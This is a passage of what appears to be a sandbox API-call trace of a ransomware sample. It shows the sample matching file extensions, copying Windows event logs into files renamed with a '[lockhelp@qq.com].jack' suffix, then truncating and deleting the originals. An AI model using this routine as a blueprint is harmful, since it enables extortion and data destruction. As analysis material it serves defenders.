4 [0209.676] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0209.676] lstrlenW (lpString=".1cd") returned 4 [0209.676] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0209.676] lstrlenW (lpString=".jpg") returned 4 [0209.676] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0209.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0209.676] lstrlenW (lpString=".doc") returned 4 [0209.676] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.676] lstrlenW (lpString=".docx") returned 5 [0209.676] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.676] lstrlenW (lpString=".pdf") returned 4 [0209.676] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.676] lstrlenW (lpString=".xls") returned 4 [0209.677] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.677] lstrlenW (lpString=".xlsx") returned 5 [0209.677] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.677] lstrlenW (lpString=".ppt") returned 4 [0209.677] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.677] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0209.677] lstrlenW (lpString=".zip") returned 4 [0209.677] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.677] lstrlenW (lpString=".rar") returned 4 [0209.677] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.677] lstrlenW (lpString=".bz2") returned 4 [0209.677] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.677] lstrlenW (lpString=".7z") returned 3 [0209.677] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.677] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0209.677] lstrlenW (lpString=".dbf") returned 4 [0209.677] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.677] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0209.677] lstrlenW (lpString=".1cd") returned 4 [0209.677] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.677] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0209.677] lstrlenW (lpString=".jpg") returned 4 [0209.677] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.677] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.677] lstrlenW (lpString="Microsoft-Windows-Ntfs%4Operational.evtx") returned 40 [0209.677] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0209.685] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0209.685] CloseHandle (hObject=0x430) returned 1 [0209.685] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx")) returned 0x20 [0209.685] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.685] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0209.685] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.685] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.685] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0209.689] GetLastError () returned 0x0 [0209.689] ReadFile (in: hFile=0x430, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.706] WriteFile (in: hFile=0x40c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.707] ReadFile (in: hFile=0x430, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.708] WriteFile (in: hFile=0x40c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x124, lpOverlapped=0x0) returned 1 [0209.708] SetEndOfFile (hFile=0x40c) returned 1 [0209.713] CloseHandle (hObject=0x40c) returned 1 [0209.724] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.724] SetEndOfFile (hFile=0x430) returned 1 [0209.735] CloseHandle (hObject=0x430) returned 1 [0209.744] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.744] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx")) returned 1 [0209.746] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0209.746] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0209.746] lstrlenW (lpString=".doc") returned 4 [0209.746] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.746] lstrlenW (lpString=".docx") returned 5 [0209.746] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.746] lstrlenW (lpString=".pdf") returned 4 [0209.746] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.746] lstrlenW (lpString=".xls") returned 4 [0209.746] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.746] lstrlenW (lpString=".xlsx") returned 5 [0209.746] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.746] lstrlenW (lpString=".ppt") returned 4 [0209.746] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.746] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0209.746] lstrlenW (lpString=".zip") returned 4 [0209.746] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.746] lstrlenW (lpString=".rar") returned 4 [0209.746] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.746] lstrlenW (lpString=".bz2") returned 4 [0209.746] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.746] lstrlenW (lpString=".7z") returned 3 [0209.746] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.746] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0209.746] lstrlenW (lpString=".dbf") returned 4 [0209.746] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.746] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0209.746] lstrlenW (lpString=".1cd") returned 4 [0209.746] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.746] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0209.747] lstrlenW (lpString=".jpg") returned 4 [0209.747] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.747] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0209.747] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0209.747] lstrlenW (lpString=".doc") returned 4 [0209.747] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.747] lstrlenW (lpString=".docx") returned 5 [0209.747] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.747] lstrlenW (lpString=".pdf") returned 4 [0209.747] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.747] lstrlenW (lpString=".xls") returned 4 [0209.747] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.747] lstrlenW (lpString=".xlsx") returned 5 [0209.747] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.747] lstrlenW (lpString=".ppt") returned 4 [0209.747] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.747] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0209.747] lstrlenW (lpString=".zip") returned 4 [0209.747] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.747] lstrlenW (lpString=".rar") returned 4 [0209.747] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.747] lstrlenW (lpString=".bz2") returned 4 [0209.747] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.747] lstrlenW (lpString=".7z") returned 3 [0209.747] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.747] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0209.747] lstrlenW (lpString=".dbf") returned 4 [0209.747] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.748] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0209.748] lstrlenW (lpString=".1cd") returned 4 [0209.748] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.748] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0209.748] lstrlenW (lpString=".jpg") returned 4 [0209.748] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.748] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.748] lstrlenW (lpString="Microsoft-Windows-SettingSync%4Debug.evtx") returned 41 [0209.748] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0209.762] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=1052672) returned 1 [0209.762] CloseHandle (hObject=0x420) returned 1 [0209.762] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx")) returned 0x20 [0209.762] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.261] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0210.261] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.261] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.261] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0210.601] GetLastError () returned 0x0 [0210.602] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0210.693] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0210.904] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x1010, lpOverlapped=0x0) returned 1 [0210.911] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x1020, lpOverlapped=0x0) returned 1 [0210.972] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0210.972] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x126, lpOverlapped=0x0) returned 1 [0210.973] SetEndOfFile (hFile=0x438) returned 1 [0214.604] CloseHandle (hObject=0x438) returned 1 [0214.669] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.670] SetEndOfFile (hFile=0x3b8) returned 1 [0214.670] CloseHandle (hObject=0x3b8) returned 1 [0214.670] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0214.671] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx")) returned 1 [0214.671] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0214.671] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0214.671] lstrlenW (lpString=".doc") returned 4 [0214.671] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0214.671] lstrlenW (lpString=".docx") returned 5 [0214.671] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0214.671] lstrlenW (lpString=".pdf") returned 4 [0214.671] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0214.671] lstrlenW (lpString=".xls") returned 4 [0214.671] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0214.671] lstrlenW (lpString=".xlsx") returned 5 [0214.672] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0214.672] lstrlenW (lpString=".ppt") returned 4 [0214.672] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0214.672] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0214.672] lstrlenW (lpString=".zip") returned 4 [0214.672] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0214.672] lstrlenW (lpString=".rar") returned 4 [0214.672] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0214.672] lstrlenW (lpString=".bz2") returned 4 [0214.672] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0214.672] lstrlenW (lpString=".7z") returned 3 [0214.672] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0214.672] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0214.672] lstrlenW (lpString=".dbf") returned 4 [0214.672] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0214.672] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0214.672] lstrlenW (lpString=".1cd") returned 4 [0214.672] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0214.672] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0214.672] lstrlenW (lpString=".jpg") returned 4 [0214.672] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0214.672] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0214.672] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0214.672] lstrlenW (lpString=".doc") returned 4 [0214.672] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0214.673] lstrlenW (lpString=".docx") returned 5 [0214.673] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0214.673] lstrlenW (lpString=".pdf") returned 4 [0214.673] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0214.673] lstrlenW (lpString=".xls") returned 4 [0214.673] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0214.673] lstrlenW (lpString=".xlsx") returned 5 [0214.673] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0214.673] lstrlenW (lpString=".ppt") returned 4 [0214.673] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0214.673] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0214.673] lstrlenW (lpString=".zip") returned 4 [0214.673] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0214.673] lstrlenW (lpString=".rar") returned 4 [0214.673] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0214.673] lstrlenW (lpString=".bz2") returned 4 [0214.673] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0214.673] lstrlenW (lpString=".7z") returned 3 [0214.673] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0214.673] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0214.673] lstrlenW (lpString=".dbf") returned 4 [0214.673] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0214.673] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0214.673] lstrlenW (lpString=".1cd") returned 4 [0214.673] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0214.673] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0214.673] lstrlenW (lpString=".jpg") returned 4 [0214.673] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0214.674] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0214.674] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Security.evtx") returned 42 [0214.674] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0214.674] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0214.674] CloseHandle (hObject=0x3b8) returned 1 [0214.674] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx")) returned 0x20 [0214.674] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0214.675] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0214.675] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.675] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.675] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0214.675] GetLastError () returned 0x0 [0214.675] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0214.742] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0214.744] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0214.744] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x128, lpOverlapped=0x0) returned 1 [0214.744] SetEndOfFile (hFile=0x438) returned 1 [0214.745] CloseHandle (hObject=0x438) returned 1 [0214.746] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0214.746] SetEndOfFile (hFile=0x3b8) returned 1 [0214.747] CloseHandle (hObject=0x3b8) returned 1 [0214.747] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0214.748] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx")) returned 1 [0214.748] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0214.748] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0214.748] lstrlenW (lpString=".doc") returned 4 [0214.748] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0214.748] lstrlenW (lpString=".docx") returned 5 [0214.748] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0214.748] lstrlenW (lpString=".pdf") returned 4 [0214.748] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0214.748] lstrlenW (lpString=".xls") returned 4 [0214.748] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0214.748] lstrlenW (lpString=".xlsx") returned 5 [0214.748] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0214.748] lstrlenW (lpString=".ppt") returned 4 [0214.748] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0214.748] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0214.748] lstrlenW (lpString=".zip") returned 4 [0214.748] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0214.748] lstrlenW (lpString=".rar") returned 4 [0214.748] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0214.748] lstrlenW (lpString=".bz2") returned 4 [0214.748] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0214.748] lstrlenW (lpString=".7z") returned 3 [0214.748] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0214.748] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0214.749] lstrlenW (lpString=".dbf") returned 4 [0214.749] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0214.749] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0214.749] lstrlenW (lpString=".1cd") returned 4 [0214.749] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0214.749] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0214.749] lstrlenW (lpString=".jpg") returned 4 [0214.749] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0214.749] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0214.749] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0214.749] lstrlenW (lpString=".doc") returned 4 [0214.749] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0214.749] lstrlenW (lpString=".docx") returned 5 [0214.749] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0214.749] lstrlenW (lpString=".pdf") returned 4 [0214.749] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0214.749] lstrlenW (lpString=".xls") returned 4 [0214.749] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0214.749] lstrlenW (lpString=".xlsx") returned 5 [0214.749] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0214.749] lstrlenW (lpString=".ppt") returned 4 [0214.749] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0214.749] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 50 [0214.749] lstrlenW (lpString=".zip") returned 4 